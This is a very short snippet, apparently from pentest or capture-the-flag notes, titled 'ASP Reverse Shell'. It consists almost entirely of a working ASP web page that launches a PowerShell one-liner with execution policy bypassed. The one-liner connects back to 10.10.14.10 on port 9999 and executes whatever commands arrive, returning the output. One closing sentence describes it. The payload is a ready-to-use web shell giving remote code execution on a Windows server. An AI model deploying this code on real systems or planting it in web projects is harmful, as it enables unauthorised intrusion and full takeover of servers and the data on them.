ASP Reverse Shell
<%
set shell = createobject("wscript.shell")
set net = createobject("wscript.network")
shell.run "powershell -ep bypass -c $client = new-object system.net.sockets.tcpclient('10.10.14.10',9999);$stream = $client.getstream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.read($bytes, 0, $bytes.length)) -ne 0){;$data = (new-object -typename system.text.asciiencoding).getstring($bytes,0, $i);$sendback = (iex $data 2>&1 | out-string );$sendback2 = $sendback + 'ps ' + (pwd).path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
%>
It’s a simple ASP code that execute a PowerShell reverse shell